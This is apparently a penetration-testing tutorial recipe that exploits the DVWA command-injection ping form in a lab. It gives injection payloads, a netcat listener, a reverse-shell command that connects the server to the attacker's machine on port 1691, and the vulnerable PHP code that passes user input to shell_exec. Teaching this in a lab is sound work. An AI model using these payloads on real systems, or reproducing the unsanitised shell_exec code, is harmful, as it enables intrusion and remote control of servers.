In the previous recipe, we have seen how PHP's system() can be used to execute OS commands in the server; sometimes developers use instructions similar to that or with the same functionality to perform some tasks and sometimes they use invalidated user inputs as parameters for the execution of commands.
In this recipe, we will exploit a Command Injection vulnerability and extract important information from the server.
- Log into the Damn Vulnerable Web Application (DVWA) and go to Command Execution.
- We will see a Ping for FREE form, let's try it. Ping to 192.168.56.1 (our Kali Linux machine's IP in the host-only network):
That output looks like it was taken directly from the ping command's output. This suggests that the server is using an OS command to execute the ping, so it may be possible to inject OS commands.
- Let's try to inject a very simple command, submit the following:
192.168.56.1;uname -a.
We can see the
unamecommand's output just after the ping's output. We have a command injection vulnerability here. - How about without the IP address:
;uname -a:
- Now, we are going to obtain a reverse shell on the server; first, we must be sure that the server has everything we need. Submit the following:
;ls /bin/nc*.
So, we have more than one version of NetCat, the tool that we are going to use to generate the connection. The OpenBSD version of
ncdoes not support the execution of commands on connection, so we will use the traditional one. - The next step is to listen to a connection in our Kali machine; open a terminal and run the following command:
nc -lp 1691 -v - Back in the browser, submit the following:
;nc.traditional -e /bin/bash 192.168.56.1 1691 &
Our terminal will react with the connection; we now can issue non-interactive commands and check their output.
Like in the case of SQL Injection, Command Injection vulnerabilities are due to a poor input validation mechanism and the use of user-provided data to form strings that will later be used as commands to the operating system. If we watch the source code of the page we just attacked (there is a button in the bottom-right corner on every DVWA's page), it will look like the following code:
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST[ 'ip' ];
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
?> We can see that it directly appends the user's input to the ping command. What we did was only to add a semicolon, which the system's shell interprets as a command separator and next to it the command we wanted to execute.
After having a successful command execution, the next step is to verify if the server has NetCat. It is a tool that has the ability to establish network connections and in some versions, to execute a command when a new connection is established. We saw that the server's system had two different versions of NetCat and executed the one we know supports the said feature.
We then set our attacking system to listen for a connection on TCP port 1691 (it could have been any other available TCP port) and after that we instructed the server to connect to our machine through that port and execute /bin/bash (a system shell) when the connection establishes; so anything we send through that connection will be received as input by the shell in the server.
The use of & at the end of the sentence is to execute the command in the background and prevent the stopping of the PHP script's execution because of it waiting for a response from the command.